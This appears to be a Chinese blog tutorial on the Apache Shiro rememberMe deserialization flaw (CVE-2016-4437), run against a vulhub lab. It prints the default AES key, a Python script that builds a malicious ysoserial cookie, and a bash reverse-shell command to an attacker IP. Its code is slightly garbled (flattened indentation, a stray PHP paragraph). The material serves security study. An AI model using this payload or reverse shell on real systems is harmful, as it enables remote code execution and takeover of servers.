Shiro框架漏洞总结

悠悠 2024-03-25 22:12 85阅读 0赞

## 一、shiro框架简介： ##

Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露，无论shiro是什么版本都会导致反序列化漏洞。Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。

## 二、shiro漏洞原理： ##

Apache Shiro框架提供了记住我的功能（RemeberMe），用户登录成功后会生成经过加密并编码的cookie。cookie的key为RemeberMe，cookie的值是经过对相关信息进行序列化，然后使用了aes加密，最后在使用base64编码处理形成的。

在服务端接收cookie值时，按以下步骤解析：

> 检索RemeberMe cooki的值
> 
> Base64解码
> 
> 使用ACE解密（加密密钥为硬编码）
> 
> 进行反序列化操作（未作过滤处理）

因为在调用反序列化的时候未进行任何过滤，导致可以触发远程代码执行漏洞。

用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后，Base64解码-->AES解密-->反序列化。

所以，攻击者只要找到AES的加密密钥，就可以构造一个恶意的对象，对其序列化-->AES加密-->Base64编码，然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化，最终造成反序列化漏洞。

## 三、Shiro序列化利用条件 ##

由于使用了AES加密，要想成功利用漏洞则需要获取AES的加密密钥，而在shiro1.2.4之前版本中使用的是硬编码，AES加密的密钥默认在代码里。其默认密钥的base64编码后的值为 kPH+bIxk5D2deZiIxcaaaA==，这里就可以通过构造恶意的序列化对象进行编码，加密，然后作为cookie加密发送，服务端接收后会解密并触发反序列化漏洞。

目前已经更新了很多版本，但是官方并没有把反序列化漏洞本身解决，而是通过去掉硬编码的密钥，使其每次生成一个密钥来解决该漏洞。但是，目前一些开源系统、教程范例代码都使用固定的编码，也有很多开源项目内部集成了shiro并二次开发，可能会重现低版本shiro的默认固定密钥的风险。例如Guns开源框架内部集成了shiro并进行二次开发，作者自定义密钥并固定，此时用户如果不对密钥进行修改，即使升级shiro版本，也依旧存在固定密钥的风险。这里可以通过搜索引擎和github来收集密钥，提高漏洞检测和利用的成功率。

如果反序列化对象中存在魔法函数，使用unserialize()函数同时也会触发。这样，一旦我们能够控制unserialize()入口，那么就可能引发对象注入漏洞。

## 四、Shiro漏洞指纹 ##

在请求包的Cookie中为rememberMe字段赋任意值，返回包中存在set-Cookie：remeberMe=deleteMe

URL中有shiro字样

有时候服务器不会主动返回remeberMe=deleteMe，直接发包即可

## 五、靶场搭建 ##

我们需要准备一台虚拟机，这台虚拟机里面必须装有docker，这台虚拟机为靶机，然后用docker去拉取vulhub靶场，以vulhub靶场中的CVE-2016-4437漏洞为例，docker安装教程与靶场拉取教程：[Vulhub - Docker-Compose file for vulnerability environment][]

## 六、漏洞攻击 ##

1.  可以使用shiro反序列化工具去找key攻击：
    
    ![1898352caef31177e69c63864b7d8af8.jpeg][]
2.  也可以自己构造poc或者去网上寻找poc,文章末尾会附上工具  
    先安装python环境，在这个poc脚本涉及了两个第三方库需要自行安装：
    
        pip installrequests
        pip install -ihttps://pypi.douban.com/simplepycryptodome
    
    安装完成后可以使用poc构造恶意payload：  
    
    
        import sys
        
        import uuid
        
        import base64
        
        import subprocess
        
        from Crypto.Cipher import AES
        
        def encode_rememberme(command):
        
        popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-BETA-all.jar','JRMPClient', command], stdout=subprocess.PIPE)      //这里使用了ysoserial工具包，它**了各种java反序列化payload，主要有CommonsCollections1-5、JRMPClient等模块
        
        BS = AES.block_size
        
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) %BS)).encode()
        
        key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
        
        iv = uuid.uuid4().bytes
        
        encryptor = AES.new(key, AES.MODE_CBC, iv)
        
        file_body = pad(popen.stdout.read())
        
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        
        return base64_ciphertext
        
        if __name__ == '__main__':
        
        payload = encode_rememberme(sys.argv[1]) 
        
        print"rememberMe={0}".format(payload.decode())
    
    目标ip:192.168.23.168  
    攻击ip:192.168.23.193  
    
    
        bash -i>& /dev/tcp/192.168.99.174/2333 0>&1
    
    因为java环境不支持管道符、输入输出重定向等，因此我们需要提前通过Java Runtime配合 bash 进行编码:  
    
    
    ![74824437c6c88f3745028f1eaf21a935.jpeg][]
3.  此处我们使用JRMPClient模块来构造恶意命令的cookie：  
    ![f5986c148b9c43928d8a1ef5da0bba1f.png][]
4.  在攻击机器监听2333端口：  
    
    
    ![86cc0264b16bd697816c1aca98951dbc.jpeg][]
5.  将反弹shell处理后发送到目标机器，这里需要使用CommonsCollections2模块：  
    ![f5986c148b9c43928d8a1ef5da0bba1f.png][]
6.  将上面生成的恶意cookie值替换目标网站抓包后的remeberMe，然后放包：  
    
    
    ![ec38183f9cfa08e45d19b95e0cee5a4c.jpeg][]
7.  查看攻击机器，已经获取到shell：  
    
    
    ![ca554ec54c309eb200cf76161a9c8e60.jpeg][]

## 七、参考工具与文献 ##

链接：https://pan.baidu.com/s/1nCdPc0RarG9YZIVb\_a-E9w

提取码：hn6o

## 八、免责声明 ##

文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

[Vulhub - Docker-Compose file for vulnerability environment]: https://vulhub.org/#/docs/
[1898352caef31177e69c63864b7d8af8.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/25/cbd6214c5a9d4b7e9db4ca78f8f6847f.png
[74824437c6c88f3745028f1eaf21a935.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/25/c7ce010c6fad4f6abcc9c871675124ac.png
[f5986c148b9c43928d8a1ef5da0bba1f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/25/88e0fcc7aa1a464d8c13de96e3ec6dac.png
[86cc0264b16bd697816c1aca98951dbc.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/25/acb1605f33ee41ce903c3e0a14a50335.png
[ec38183f9cfa08e45d19b95e0cee5a4c.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/25/a644bbe3f7134afdb28df36aa85480b6.png
[ca554ec54c309eb200cf76161a9c8e60.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/25/06cdfe805cbe47429759b14e328fbe6f.png